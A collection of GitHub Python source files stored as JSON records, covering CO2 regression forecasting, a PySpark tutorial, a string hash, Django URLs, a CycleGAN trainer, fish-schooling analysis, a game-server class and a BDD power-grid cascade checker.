+{"seq_id":"70742169180","text":"import pandas as pd \nimport numpy as np\nfrom scipy.optimize import curve_fit\n# import matplotlib.pyplot as plt\n\ndef linReg(startYear, userInput, existingData):\n years, points = [], []\n userInput = sorted(userInput, key=lambda x: x['Year'])\n existingData = sorted(existingData, key=lambda x: x['Year'])\n for elem in existingData:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n for elem in userInput:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n data = pd.DataFrame(np.array([years, points]).T, columns=['Year', 'CO2Emissions'])\n x = data['Year']\n y = data['CO2Emissions'] \n lin_model = np.polyfit(x, y, 1)\n coef, intcp = lin_model\n\n pred_lin_vals = []\n for year in range(startYear, 2050):\n val = intcp + coef*year\n if val >= 0:\n pred_lin_vals.append({\"Year\": year, \"CO2Emissions\": val})\n return pred_lin_vals\n\ndef expReg(startYear, userInput, existingData):\n def func(x, a, b, c):\n return a * np.exp(b * x) + c\n\n years, points = [], []\n userInput = sorted(userInput, key=lambda x: x['Year'])\n existingData = sorted(existingData, key=lambda x: x['Year'])\n for elem in existingData:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n for elem in userInput:\n years.append(elem[\"Year\"])\n points.append(elem[\"CO2Emissions\"])\n data = pd.DataFrame(np.array([years, points]).T, columns=['Year', 'CO2Emissions'])\n x = data['Year']\n y = data['CO2Emissions']\n\n popt, pcov = curve_fit(func, x, y, p0=(1,1e-6,1), maxfev=10000)\n pred_exp_vals = []\n for year in range(startYear, 2050):\n val = func(year, *popt)\n if val >= 0:\n pred_exp_vals.append({\"Year\": year, \"CO2Emissions\": val})\n return pred_exp_vals\n","repo_name":"mamn2/ClimateRegressionPredictor","sub_path":"Database/basicRegs.py","file_name":"basicRegs.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34894399266","text":"from pyspark.sql import SparkSession\nspark=SparkSession.builder.getOrCreate()\nsc=spark.sparkContext\nrdd1=sc.textFile(\"hdfs://localhost:54310/user/hduser/custs\",4)\n#rdd1=rdd1.repartition(4)\nrdd2=rdd1.map(lambda x:x.split(\",\"))\nprint(\"sample customers are \")\nprint(rdd2.take(10))\nprint(\"total customers are \")\nprint(rdd2.count())\nrdd3=rdd2.map(lambda x:(int(x[0]),int(x[3]),x[4])).filter(lambda x:x[1]>60)\nrdd3.coalesce(1).saveAsTextFile(\"hdfs:/user/hduser/custoutdata2\")\n\nspark.sparkContext.setLogLevel(\"INFO\")\nrdd1=spark.sparkContext.textFile(\"/user/hduser/empdata2/\")\nrdd1.cache()\nrdd2=rdd1.map(lambda x:x.split(\",\"))\nlocal_python_var_kept_in_driver=rdd2.collect()\n#collect action will collect the data from rdd (executors) to driver or collect used for\n# converting the rdd to normal values\nprint(local_python_var_kept_in_driver)\nrdd3=rdd2.filter(lambda x:len(x)==5)\ndf1=rdd3.toDF()\ndf1.cache()\ndf1.select(\"*\").show(4)\ndf1.createOrReplaceTempView(\"view1\")\nspark.sql(\"describe view1\").show()\nspark.sql(\"select _1,_2,_3 from view1\").write.mode(\"overwrite\").orc(\"/user/hduser/empdataorc\")\nspark.read.orc(\"/user/hduser/empdataorc\").show()\nprint(\"end of spark core, sql application\")\n\n#spark-submit --master yarn --executor-memory 2g --num-executors 2 --deploy-mode client /home/hduser/core_submit.py\n#spark-submit --master yarn --executor-memory 2g --num-executors 2 --deploy-mode cluster /home/hduser/core_submit.p\n","repo_name":"sundarbee/Spark_Learning","sub_path":"Python_Pyspark_Programs/wd28Project/SparkProg/Core/sample_deploy.py","file_name":"sample_deploy.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28648625523","text":"_seed = 131\n\ndef bkdrhash(str):\n hashnum = 0\n sz = len(str)\n for i in range(sz):\n hashnum = (hashnum * _seed) + ord(str[i])\n \n return hashnum & 0x7FFFFFFF\n\nif __name__ == \"__main__\":\n print(bkdrhash('hello world'))","repo_name":"lvchy/ClientTools","sub_path":"UABTools/bkdrhash.py","file_name":"bkdrhash.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9659988157","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'videodata_gen.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'videodata_app.views.home', name='home'),\n url(r'^viewer/(?P[\\w-]+)/$', 'videodata_app.views.viewer_video', name='viewer'),\n url(r'^tagging/(?P[\\w-]+)/$', 'videodata_app.views.tagging', name='tagging'),\n # url(r'^tagging/(?P[\\w-]+)/(?P[\\w-]+)$', 'videodata_app.views.save_tag', name='save_tag'),\n url(r'^tagging/(?P[\\w-]+)/crear_tag/$', 'videodata_app.views.save_tag', name='crear_tag'),\n)\n","repo_name":"cbertelegni/videodata","sub_path":"videodata_gen/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"74643990940","text":"import numpy as np\nfrom tqdm import trange, tqdm\nimport glob\nimport h5py\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.preprocessing import image\nimport random\nfrom models import components, mae_loss, mse_loss\nimport scipy.misc\n# Avoid crash on non-X linux sessions (tipically servers) when plotting images\nimport matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport gc\nimport time\nfrom glob import glob\n\n# Images size\nw = 256\nh = 256\n\n# Cyclic consistency factor\n\nlmda = 10\n\n# Optimizer parameters\n\nlr = 0.0002\nbeta_1 = 0.5\nbeta_2 = 0.999\nepsilon = 1e-08\n\n# Setting image format as (channels, height, width)\nK.set_image_dim_ordering('th')\n\ndisc_a_history = []\ndisc_b_history = []\n\ngen_a2b_history = {'bc': [], 'mae': []}\ngen_b2a_history = {'bc': [], 'mae': []}\n\ngen_b2a_history_new = []\ngen_a2b_history_new = []\ncycle_history = []\n\nmodel_save_folder = \"models\"\n\n\n# Data loading\n\ndef loadImage(path, h, w):\n '''Load single image from specified path'''\n if path in cache:\n return cache[path]\n img = image.load_img(path)\n img = img.resize((w, h))\n x = image.img_to_array(img)\n cache[path] = x\n return x\n\ndef loadImagesFromDataset(h, w, dataset, use_hdf5=False):\n '''Return a tuple (trainA, trainB, testA, testB)\n containing numpy arrays populated from the\n test and train set for each part of the cGAN'''\n\n if (use_hdf5):\n path = \"./datasets/processed/\" + dataset + \"_data.h5\"\n data = []\n print('\\n', '-' * 15, 'Loading data from dataset', dataset, '-' * 15)\n with h5py.File(path, \"r\") as hf:\n for set_name in tqdm([\"trainA_data\", \"trainB_data\", \"testA_data\", \"testB_data\"]):\n data.append(hf[set_name][:].astype(np.float32))\n\n return (set_data for set_data in data)\n\n else:\n path = \"./datasets/\" + dataset\n print(path)\n train_a = glob.glob(path + \"/trainA/*.jpg\")\n train_b = glob.glob(path + \"/trainB/*.jpg\")\n test_a = glob.glob(path + \"/testA/*.jpg\")\n test_b = glob.glob(path + \"/testB/*.jpg\")\n\n print(\"Import trainA\")\n if dataset == \"nike2adidas\" or (\"adiedges\" in dataset):\n tr_a = np.array([loadImage(p, h, w) for p in tqdm(train_a[:1000])])\n else:\n tr_a = np.array([loadImage(p, h, w) for p in tqdm(train_a)])\n\n print(\"Import trainB\")\n if dataset == \"nike2adidas\" or (\"adiedges\" in dataset):\n tr_b = np.array([loadImage(p, h, w) for p in tqdm(train_b[:1000])])\n else:\n tr_b = np.array([loadImage(p, h, w) for p in tqdm(train_b)])\n\n print(\"Import testA\")\n ts_a = np.array([loadImage(p, h, w) for p in tqdm(test_a)])\n\n print(\"Import testB\")\n ts_b = np.array([loadImage(p, h, w) for p in tqdm(test_b)])\n\n return tr_a, tr_b, ts_a, ts_b\ncache = dict()\nn_batches = -1\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\ndef load_batch(dataset, batch_size=1, is_testing=False, break_img=False):\n data_type = \"train\" if not is_testing else \"test\"\n a = f'./datasets/{dataset}/{data_type}A/*'\n b = f'./datasets/{dataset}/{data_type}B/*'\n path_A = None\n path_B = None\n if a in cache:\n path_A = cache[a]\n else:\n path_A = glob(a)\n\n if b in cache:\n path_B = cache[b]\n else:\n path_B = glob(b)\n\n n_batches = int(min(len(path_A), len(path_B)) / batch_size)\n total_samples = n_batches * batch_size\n\n # Sample n_batches * batch_size from each path list so that model sees all\n # samples from both domains\n path_A = np.random.choice(path_A, total_samples, replace=False)\n path_B = np.random.choice(path_B, total_samples, replace=False)\n\n for i in range(n_batches-1):\n start_time = current_milli_time()\n batch_A = path_A[i*batch_size:(i+1)*batch_size]\n batch_B = path_B[i*batch_size:(i+1)*batch_size]\n imgs_A, imgs_B = [], []\n for img_A, img_B in zip(batch_A, batch_B):\n img_B = load_img2(img_B, break_img=break_img)\n img_A = load_img2(img_A, break_img=break_img)\n\n\n imgs_A.append(img_A)\n imgs_B.append(img_B)\n\n imgs_A = np.array(imgs_A)/127.5 - 1.\n imgs_B = np.array(imgs_B)/127.5 - 1.\n\n yield imgs_A, imgs_B, current_milli_time() - start_time\n\ndef load_img2( path, break_img):\n name = path\n if name in cache:\n img = cache[name]\n else:\n img = loadImage(path, h , w)\n cache[name] = img\n return img\n# Create a wall of generated images\ndef plotGeneratedImages(epoch, dataset, batch_size, generator_a2b, generator_b2a, examples=6):\n\n a1, b1, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a2, b2, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a3, b3, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a4, b4, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a5, b5, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n a6, b6, t = next(load_batch(dataset, batch_size, is_testing=True, ))\n set_a= np.array([a1[0],a2[0],a3[0],a4[0],a5[0],a6[0]])\n set_b= np.array([b1[0],b2[0],b3[0],b4[0],b5[0],b6[0]])\n true_batch_a = set_a[np.random.randint(0, set_a.shape[0], size=examples)]\n true_batch_b = set_b[np.random.randint(0, set_b.shape[0], size=examples)]\n\n # Get fake and cyclic images\n generated_a2b = generator_a2b.predict(true_batch_a)\n cycle_a = generator_b2a.predict(generated_a2b)\n generated_b2a = generator_b2a.predict(true_batch_b)\n cycle_b = generator_a2b.predict(generated_b2a)\n\n k = 0\n\n # Allocate figure\n plt.figure(figsize=(w / 10, h / 10))\n\n for output in [true_batch_a, generated_a2b, cycle_a, true_batch_b, generated_b2a, cycle_b]:\n output = (output + 1.0) / 2.0\n for i in range(output.shape[0]):\n plt.subplot(examples, examples, k * examples + (i + 1))\n img = output[i].transpose(1, 2, 0) # Using (ch, h, w) scheme needs rearranging for plt to (h, w, ch)\n # print(img.shape)\n plt.imshow(img)\n plt.axis('off')\n plt.tight_layout()\n k += 1\n plt.savefig(\"images/epoch\" + str(epoch) + \".png\")\n plt.close()\n\n\n# Plot the loss from each batch\n\ndef plotLoss_new():\n plt.figure(figsize=(10, 8))\n plt.plot(disc_a_history, label='Discriminator A loss')\n plt.plot(disc_b_history, label='Discriminator B loss')\n plt.plot(gen_a2b_history_new, label='Generator a2b loss')\n plt.plot(gen_b2a_history_new, label='Generator b2a loss')\n # plt.plot(cycle_history, label=\"Cyclic loss\")\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('images/cyclegan_loss.png')\n plt.close()\n\n\ndef saveModels(epoch, dataset, genA2B, genB2A, discA, discB):\n print(\"Saving Model...\")\n genA2B.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorA2B.h5')\n genB2A.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorB2A.h5')\n discA.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorA.h5')\n discB.save(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorBh.h5')\n print(\"Model Saved!\")\n\n\ndef loadModels(epoch, dataset, genA2B, genB2A, discA, discB):\n try:\n genA2B.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorA2B.h5')\n genB2A.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_generatorB2A.h5')\n discA.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorA.h5')\n discB.load_weights(f'{model_save_folder}/{dataset}_{epoch}_{w}x{h}_discriminatorB.h5')\n except Exception as e:\n print(f\"Failed to load model: {e}\")\n\n\n# Training\n\ndef train(epochs, batch_size, dataset, baselr, use_pseudounet=False, use_unet=False, use_decay=False, plot_models=True,\n end_of_epoch_callback=None):\n if end_of_epoch_callback is not None:\n end_of_epoch_callback()\n\n # Load data and normalize\n # x_train_a, x_train_b, x_test_a, x_test_b = loadImagesFromDataset(h, w, dataset, use_hdf5=False)\n # x_train_a = (x_train_a.astype(np.float32) - 127.5) / 127.5\n # x_train_b = (x_train_b.astype(np.float32) - 127.5) / 127.5\n # x_test_a = (x_test_a.astype(np.float32) - 127.5) / 127.5\n # x_test_b = (x_test_b.astype(np.float32) - 127.5) / 127.5\n\n batchCount_a = n_batches\n batchCount_b = n_batches\n\n # Train on same image amount, would be best to have even sets\n batchCount = min([batchCount_a, batchCount_b])\n\n print('\\nEpochs:', epochs)\n print('Batch size:', batch_size)\n print('Batches per epoch: ', batchCount, \"\\n\")\n\n # Retrieve components and save model before training, to preserve weights initialization\n disc_a, disc_b, gen_a2b, gen_b2a = components(w, h, pseudounet=use_pseudounet, unet=use_unet, plot=plot_models)\n\n\n # LOAD AND SAVE ====\n loadModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n # saveModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n\n # Initialize fake images pools\n pool_a2b = []\n pool_b2a = []\n\n # Define optimizers\n adam_disc = Adam(lr=baselr, beta_1=0.5)\n adam_gen = Adam(lr=baselr, beta_1=0.5)\n\n # Define image batches\n true_a = gen_a2b.inputs[0]\n true_b = gen_b2a.inputs[0]\n\n fake_b = gen_a2b.outputs[0]\n fake_a = gen_b2a.outputs[0]\n\n fake_pool_a = K.placeholder(shape=(None, 3, h, w))\n fake_pool_b = K.placeholder(shape=(None, 3, h, w))\n\n # Labels for generator training\n y_fake_a = K.ones_like(disc_a([fake_a]))\n y_fake_b = K.ones_like(disc_b([fake_b]))\n\n # Labels for discriminator training\n y_true_a = K.ones_like(disc_a([true_a])) * 0.9\n y_true_b = K.ones_like(disc_b([true_b])) * 0.9\n\n fakelabel_a2b = K.zeros_like(disc_b([fake_b]))\n fakelabel_b2a = K.zeros_like(disc_a([fake_a]))\n\n # Define losses\n disc_a_loss = mse_loss(y_true_a, disc_a([true_a])) + mse_loss(fakelabel_b2a, disc_a([fake_pool_a]))\n disc_b_loss = mse_loss(y_true_b, disc_b([true_b])) + mse_loss(fakelabel_a2b, disc_b([fake_pool_b]))\n\n gen_a2b_loss = mse_loss(y_fake_b, disc_b([fake_b]))\n gen_b2a_loss = mse_loss(y_fake_a, disc_a([fake_a]))\n\n cycle_a_loss = mae_loss(true_a, gen_b2a([fake_b]))\n cycle_b_loss = mae_loss(true_b, gen_a2b([fake_a]))\n cyclic_loss = cycle_a_loss + cycle_b_loss\n\n # Prepare discriminator updater\n discriminator_weights = disc_a.trainable_weights + disc_b.trainable_weights\n disc_loss = (disc_a_loss + disc_b_loss) * 0.5\n discriminator_updater = adam_disc.get_updates(discriminator_weights, [], disc_loss)\n\n # Prepare generator updater\n generator_weights = gen_a2b.trainable_weights + gen_b2a.trainable_weights\n gen_loss = (gen_a2b_loss + gen_b2a_loss + lmda * cyclic_loss)\n generator_updater = adam_gen.get_updates(generator_weights, [], gen_loss)\n\n # Define trainers\n generator_trainer = K.function([true_a, true_b], [gen_a2b_loss, gen_b2a_loss, cyclic_loss], generator_updater)\n discriminator_trainer = K.function([true_a, true_b, fake_pool_a, fake_pool_b], [disc_a_loss / 2, disc_b_loss / 2],\n discriminator_updater)\n\n epoch_counter = 1\n\n plotGeneratedImages(epoch_counter,dataset, batch_size, gen_a2b, gen_b2a)\n\n # Start training\n for e in range(1, epochs + 1):\n print('\\n', '-' * 15, 'Epoch %d' % e, '-' * 15)\n gc.collect()\n\n # Learning rate decay\n if use_decay and (epoch_counter > 100):\n lr -= baselr / 100\n adam_disc.lr = lr\n adam_gen.lr = lr\n\n # Initialize progbar and batch counter\n # progbar = generic_utils.Progbar(batchCount)\n\n # np.random.shuffle(x_train_a)\n # np.random.shuffle(x_train_b)\n print(f\"Batch count: {batchCount}\")\n # Cycle through batches\n for i in trange(int(1000)):\n\n # Select true images for training\n # true_batch_a = x_train_a[np.random.randint(0, x_train_a.shape[0], size=batch_size)]\n # true_batch_b = x_train_b[np.random.randint(0, x_train_b.shape[0], size=batch_size)]\n\n true_batch_a, true_batch_b, load_time = next(load_batch(dataset, batch_size, is_testing=False, ))\n print(f\"Load time: {load_time}\")\n # true_batch_a = x_train_a[i * batch_size:i * batch_size + batch_size]\n # true_batch_b = x_train_b[i * batch_size:i * batch_size + batch_size]\n\n # Fake images pool\n a2b = gen_a2b.predict(true_batch_a)\n b2a = gen_b2a.predict(true_batch_b)\n\n tmp_b2a = []\n tmp_a2b = []\n\n for element in a2b:\n if len(pool_a2b) < 50:\n pool_a2b.append(element)\n tmp_a2b.append(element)\n else:\n p = random.uniform(0, 1)\n\n if p > 0.5:\n index = random.randint(0, 49)\n tmp = np.copy(pool_a2b[index])\n pool_a2b[index] = element\n tmp_a2b.append(tmp)\n else:\n tmp_a2b.append(element)\n\n for element in b2a:\n if len(pool_b2a) < 50:\n pool_b2a.append(element)\n tmp_b2a.append(element)\n else:\n p = random.uniform(0, 1)\n\n if p > 0.5:\n index = random.randint(0, 49)\n tmp = np.copy(pool_b2a[index])\n pool_b2a[index] = element\n tmp_b2a.append(tmp)\n else:\n tmp_b2a.append(element)\n\n pool_a = np.array(tmp_b2a)\n pool_b = np.array(tmp_a2b)\n\n # Update network and obtain losses\n disc_a_err, disc_b_err = discriminator_trainer([true_batch_a, true_batch_b, pool_a, pool_b])\n gen_a2b_err, gen_b2a_err, cyclic_err = generator_trainer([true_batch_a, true_batch_b])\n\n # progbar.add(1, values=[\n # (\"D A\", disc_a_err*2),\n # (\"D B\", disc_b_err*2),\n # (\"G A2B loss\", gen_a2b_err),\n # (\"G B2A loss\", gen_b2a_err),\n # (\"Cyclic loss\", cyclic_err)\n # ])\n\n # Save losses for plotting\n disc_a_history.append(disc_a_err)\n disc_b_history.append(disc_b_err)\n\n gen_a2b_history_new.append(gen_a2b_err)\n gen_b2a_history_new.append(gen_b2a_err)\n\n # cycle_history.append(cyclic_err[0])\n plotLoss_new()\n\n plotGeneratedImages(epoch_counter, dataset, batch_size, gen_a2b, gen_b2a)\n\n saveModels(epoch_counter, dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n saveModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n\n epoch_counter += 1\n\n if end_of_epoch_callback is not None:\n end_of_epoch_callback()\n\n\ndef end_of_epoch_callback():\n print(\"potato\")\n\n\nif __name__ == '__main__':\n train(200, 1, \"n-yandex\", lr, use_decay=True, use_pseudounet=False, use_unet=False, plot_models=False,\n end_of_epoch_callback=end_of_epoch_callback)\n# tensorflowjs_converter --input_format keras models/n-yandex_latest_256x256_generatorA2B.h5 out/","repo_name":"DexterHuang/cycleGAN","sub_path":"cycleGAN.py","file_name":"cycleGAN.py","file_ext":"py","file_size_in_byte":15413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9975974390","text":"\"\"\" \norientation.py \n\nPlot the distribution of orientation angles of nearest\nneighbouring prey fish.\n\"\"\"\n\nfrom fishmodel import Environment, Prey, Predator, Food\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom fishmodel import fast_norm\nfrom parameter_fit import fit_params\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nfrom scipy import stats\nfrom progress.bar import Bar\n\ndef get_angle(v1, v2):\n cosang = np.dot(v1, v2)\n sinang = fast_norm(np.cross(v1, v2))\n return np.arctan2(sinang, cosang)\n\ndef get_closest_angle(prey, neighbors):\n i = get_closest_neighbor(prey, neighbors)\n\n return get_angle(prey.vel, neighbors[i].vel)\n\ndef get_closest_neighbor(prey, neighbors):\n \"\"\" Returns distance to nearest neighbor\"\"\"\n all_dist = []\n for n in neighbors:\n if n is not prey:\n all_dist.append(fast_norm(prey.pos - n.pos))\n return all_dist.index(np.min(all_dist))\n\ndef nn_orientation(env, timesteps=700):\n y = []\n bar = Bar(\"timesteps\", max=timesteps)\n for _ in range(timesteps):\n angles = []\n n = 0\n for prey in env.prey:\n if not prey.active:\n continue\n\n angles.append(get_closest_angle(prey, env.prey))\n n += 1\n\n average = np.sum(angles) / n\n y.append(average)\n env.timestep()\n bar.next()\n bar.finish()\n return np.array(y)\n\nif __name__ == \"__main__\":\n env = Environment(20, 0)\n angles = nn_orientation(env)\n\n\n plt.figure(figsize=(8, 7))\n x = np.linspace(-0.7, 1.7, 100)\n plt.plot(x, stats.norm.pdf(x, np.mean(angles), np.std(angles)))\n plt.ylabel('probability density')\n plt.xlabel(r'$\\theta_{nn}$')\n print('mean', np.mean(angles), 'std', np.std(angles))\n\n plt.show()","repo_name":"daanvinken/FishSchooling","sub_path":"orientation.py","file_name":"orientation.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37977949080","text":"# -*- coding: gb18030 -*-\n\n\nfrom SpaceCopy import SpaceCopy\nfrom interface.SpaceCopyRaidRecordInterface import SpaceCopyRaidRecordInterface\n\nMIN_TEAM_MEMBER_COUNT\t= 3\n\nclass SpaceCopyTianguan( SpaceCopy, SpaceCopyRaidRecordInterface ):\n\t\"\"\"\n\t\"\"\"\n\tdef __init__(self):\n\t\tSpaceCopy.__init__( self )\n\t\tSpaceCopyRaidRecordInterface.__init__( self )\n\t\tself.spawnMonstersList = {}\n\n\n\tdef addSpawnPointTianguan( self, spawnMailBox, grade, teamcount ):\n\t\t\"\"\"\n\t\tdefine method\n\t\t空间管理着一批刷怪点\n\t\t\"\"\"\n\t\tkey = str(grade) + \"and\" + str(teamcount)\n\t\tif not self.spawnMonstersList.has_key( key ):\n\t\t\tself.spawnMonstersList[key] = [spawnMailBox]\n\t\telse:\n\t\t\tself.spawnMonstersList[key].append( spawnMailBox )\n\n\n\tdef spawnMonsters( self, params ):\n\t\t\"\"\"\n\t\tdefine method\n\t\t\"\"\"\n\t\ttc = params[\"teamcount\"]\n\t\tif tc < 3:\n\t\t\ttc = 3\n\t\tfor i in xrange( MIN_TEAM_MEMBER_COUNT, tc + 1 ):\n\t\t\tkey = str(params[\"grade\"]) + \"and\" + str(i)\n\t\t\tif not key in self.spawnMonstersList:\n\t\t\t\tcontinue\n\t\t\tfor j in self.spawnMonstersList[key]:\n\t\t\t\td = {}\n\t\t\t\td[ \"tianguan_level\" ] = params[\"copyLevel\"]\n\t\t\t\td[ \"current_toll_gate\" ] = params[\"grade\"]\n\t\t\t\tj.cell.createEntity( d )\n\n\tdef onEnter( self, baseMailbox, params ):\n\t\t\"\"\"\n\t\tdefine method.\n\t\t玩家进入了空间,需要根据副本boss的击杀情况给予玩家\n\t\t相应的提示,并让玩家选择是继续副本还是离开副本。\n\t\t@param baseMailbox: 玩家mailbox\n\t\t@type baseMailbox: mailbox\n\t\t@param params: 玩家onEnter时的一些额外参数\n\t\t@type params: py_dict\n\t\t\"\"\"\n\t\tSpaceCopy.onEnter( self, baseMailbox, params )\n\t\tSpaceCopyRaidRecordInterface.onEnter( self, baseMailbox, params )\n","repo_name":"mudsave/csol2_enities_45541","sub_path":"base/SpaceCopyTianguan.py","file_name":"SpaceCopyTianguan.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9991514576","text":"from dd import autoref as _bdd\nimport xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport re\n\nclass blackout_BDD():\n def __init__(self, varList, simulationData = None ):\n assert(varList != None)\n self.vars = varList # TopologyData is a list of labels associated to variables.\n self.bdd_initiatingEvents = _bdd.BDD()\n self.bdd_transitionRelation = _bdd.BDD()\n self.InitiatingEvents = \"\"\n self.TransitionRelation = \"\"\n self.initiatingEventExpr = self.bdd_initiatingEvents.false\n self.transitionRelationExpr = self.bdd_transitionRelation.false\n self.primes = OrderedDict()\n self.qvars = list()\n self.counter = 0\n for var in self.vars:\n self.bdd_initiatingEvents.add_var(var)\n self.bdd_transitionRelation.add_var(var)\n self.bdd_transitionRelation.add_var(var + 'p')\n self.primes[var + 'p'] = var\n self.qvars.append(var)\n if not simulationData is None:\n self.xmlfile = simulationData\n self.createBDDs()\n\n def updateInitiatingEvents(self, newEvaluation):\n self.initiatingEventExpr = self.initiatingEventExpr | newEvaluation\n\n def updateTransitionRelation(self, newRelation):\n self.transitionRelationExpr = self.transitionRelationExpr | newRelation\n\n def createBDDs(self):\n root = ET.parse(self.xmlfile).getroot()\n for path in root.iter('Path'):\n self.counter = self.counter + 1\n initial_outages = list()\n for Initial_Stage in path.iter('Initial_Stage'):\n for outage in Initial_Stage.iter('Outage'):\n initial_outages.append(outage.text)\n self.updateInitiatingEvents(self.bdd_initiatingEvents.add_expr(self.getExpressionStringInitial(initial_outages)))\n for Cascade_stage in path.iter('Cascading_Stage'):\n for StageNum in Cascade_stage.iter('Stage_Number'):\n cascade_outages = list()\n for outage in StageNum.iter('Outage'):\n cascade_outages.append(outage.text)\n self.updateTransitionRelation(self.bdd_transitionRelation.add_expr(self.getTransitionString(initial_outages, cascade_outages)))\n initial_outages.extend(cascade_outages)\n if self.counter == 300:\n break\n\n #dumping the bdds in a pickle file\n self.bdd_initiatingEvents.dump('InitiatingEventsExpr.p',[self.initiatingEventExpr])\n self.bdd_transitionRelation.dump('TransitionRelationExpr.p',[self.transitionRelationExpr])\n\n def printInitiatingEventsBDD(self):\n self.bdd_initiatingEvents.dump('InitiatingEvents.pdf', [self.initiatingEventExpr])\n\n def printTransitionRelationsBDD(self):\n self.bdd_transitionRelation.dump('TransitionRelation.pdf', [self.transitionRelationExpr])\n\n def getExpressionStringInitial(self,outage):\n initial_string = \"\"\n for item in self.vars:\n if item in outage:\n if initial_string:\n initial_string = initial_string + ' & ' + '!' + item\n else:\n initial_string = '!' + item\n else:\n if initial_string:\n initial_string = initial_string + ' & ' + item\n else:\n initial_string = item\n return initial_string\n\n\n def getExpressionStringTransition(self,prevOutage_dict, nextOutage_dict):\n answer1 = \"\"\n answer2 = \"\"\n for key in prevOutage_dict:\n if answer1:\n op = \" & \"\n else:\n op = \"\"\n if prevOutage_dict[key] :\n answer1 = answer1 + op + key\n else:\n answer1 = answer1 + op + '!' + key\n for key in nextOutage_dict:\n if answer2:\n op = \" & \"\n else:\n op = \"\"\n if nextOutage_dict[key] :\n answer2 = answer2 + op + key + 'p'\n else:\n answer2 = answer2 + op + '!' + key + 'p'\n return answer1 + ' & ' + answer2\n\n def getTransitionString(self, prev, next_):\n prevString = OrderedDict()\n nextString = OrderedDict()\n for var in self.vars:\n prevString[var] = True\n nextString[var] = True\n for item in prev:\n prevString[item] = False\n nextString[item] = False\n for item in next_:\n nextString[item] = False\n return self.getExpressionStringTransition(prevString, nextString)\n\n\n def checkInitialState(self, currentState):\n return self.bdd_initiatingEvents.evaluate(self.initiatingEventExpr, currentState)\n\n def checkSystemState(self, currentState):\n if self.bdd_initiatingEvents.evaluate(self.initiatingEventExpr, currentState) != -1:\n return self.getFixedPointPath(currentState)\n else:\n return False\n\n def getFixedPointPath(self, currentState):\n path = list();\n initial = self.bdd_transitionRelation.add_expr(self.dictToList(currentState))\n while(self.bdd_transitionRelation.sat_len(initial) != 0):\n temp = _bdd.image(self.transitionRelationExpr, initial, self.primes, self.qvars, self.bdd_transitionRelation)\n path.append(list(self.bdd_transitionRelation.sat_iter(temp)))\n initial = temp\n return path\n\n def dictToList(self, state):\n answer = \"\"\n for var in self.vars:\n if answer:\n if state[var]:\n answer = answer + ' & ' + var\n else:\n answer = answer + ' & ' + '!' + var\n else:\n if state[var]:\n answer = var\n else:\n answer = '!' + var\n return answer\n","repo_name":"chhokrad/BDD_POWER","sub_path":"Code/SymbolicModelCheckerWOS.py","file_name":"SymbolicModelCheckerWOS.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
